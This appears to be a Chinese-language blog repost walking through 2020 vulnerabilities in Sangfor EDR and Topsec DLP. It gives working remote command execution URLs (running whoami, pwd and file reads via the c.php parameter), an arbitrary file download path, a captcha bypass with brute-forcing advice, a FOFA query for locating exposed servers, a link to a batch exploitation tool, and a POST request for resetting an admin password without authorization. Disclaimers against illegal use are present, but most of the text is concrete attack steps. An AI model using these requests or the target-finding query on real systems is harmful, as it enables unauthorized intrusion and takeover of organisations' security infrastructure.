【漏洞日记】深信服EDR 吾还没见过,就听说被人日穿了
原创:Agan '
原文链接:https://blog.csdn.net/God_XiangYu/article/details/108068029
当你的才华
还撑不起你的野心时
那你就应该静下心来学习
目录
0x01 深信服EDR 长啥样?
0x02 深信服EDR RCE
0x03 漏洞简单简单利用方法
任意执行命令
Linux 读取文件内容命令
任意文件下载漏洞复现
验证码绕过
友情提示:不是自己公司的服务器不要去试,你任何的动作,别人都知晓,人外有人,天外有天,且行且珍惜... ...
0x04 FoFa 搜索相关漏洞服务器
0x05 批量利用方法
分析漏洞原文章
0x06 天融信DLP 最新版本V3.1130.308ps3_DLP.1 未授权访问导致越权修改管理员密码
本来忙的都没时间看文章,没时间干其它的事,但还是想写一波复现文章,主要还是深信服的终端复现,谁让... ..
还迷迷糊糊的就听到爆了好多0day,感觉不简单,别问我,我也不清楚,也不敢多少什么,牵制到太多.. .. ,参考了公众号和一些师傅们的思路和复现文章,自己再复现一下看看,请勿用作犯罪使用,网络不是法外之地,请珍惜生命,勿触犯法律... ...
本次爆0day 列表:
1. 天擎EDR
2. 深信服VPN
3. 深信服EDR
4. 天融信DLP
其中最惨的当属深信服(每年都躺枪,都哭了)
地点:https://xxx.xxx.xxx:9443/tool/log/c.php?strip_slashes=system&host=whoami
这样?执行了... ...,不清楚是不是后门... ..,咋不敢乱猜测,别看... ...CSDN可能也有用。牛逼
深入一点点:https://xxx.xxx.xxx:9443/tool/log/c.php?strip_slashes=system&host=pwd
查看当前路径
再看看当前路径下有哪些文件
more和less一般用于显示文件内容超过一屏的内容,并且提供翻页的功能。
more比cat强大,提供分页显示的功能,less比more更强大,提供翻页,跳转,查找等命令。
而且more和less都支持:用空格显示下一页,按键b显示上一页。下面详细介绍这3个命令。
1)cat 后面跟要查看的文件,文件内容全部输出到屏幕,
2)more 文件内容或输出查看工具;
more 是我们最常用的工具之一,最常用的就是显示输出的内容,然后根据窗口的大小进行分页显示,然后还能提示文件的百分比;
3)less 查看文件内容
用cat 命令查看,哦吼不行,用less 也还是不想,哦吼用more OJBK,可以了
https://xxx.xxx.xxx:9443/tool/log/c.php?strip_slashes=system&host=more%20/XXXXX/l.php
下载一个存在的文件,你懂我的意思吧?可以下载任意文件,不限制目录哦
https://xxx.xxx.xxx:9443/tool/log/a
部分代码如下:
// 校验验证码
if (!ldb_run_at_console()) {
if (isset($_REQUEST["captcha"])
|| $_REQUEST["captcha"] != base64_decode("M...
echo "<font color='red'><b>验证码不对,请输入..."
return;
}
}
先输入几次错误密码,把验证码弄出来后,开启Burp(抓包工具)爆破密码即可,只要验证码第一次输入对后不为空,即可绕过
如何去找有漏洞的呢?别说是我告诉你们的哦,其中一种方法就是如下,我反正不敢日,请勿尝试,非法攻击是犯法的,如上写的利用方式比较细致,请误拿去触犯法律,如果发生任何结果,都于作者无关
友情提示:不是自己公司的服务器不要去试,你任何的动作,别人都知晓,人外有人,天外有天,且行且珍惜... ...
Fofa:
title="终端检测响应平台" && country="CN"
网上已经放出批量利用方法了
如下:https://github.com/A2gel/sangfor-edr-exploit
漏洞通告:深信服edr控制端存在大量RCE漏洞,建议下线处理
0x06 天融信DLP 最新版本V3.1130.308ps3_DLP.1 未授权访问导致越权修改管理员密码
网上就只有一张截图,推测是调用了mod_pwd 修改密码模块时,没有进行校验原密码+该api接口未授权访问,组合利用,导致管理员密码可被越权修改
POST /?module=auth_user&action=mod_edit_pwd HTTP/1.1
Host:xxxx
剩下的一些参数省略.... ...
uid=1&pd=Tftp@dlp108&mod_pwd=1&dlp_perm=1
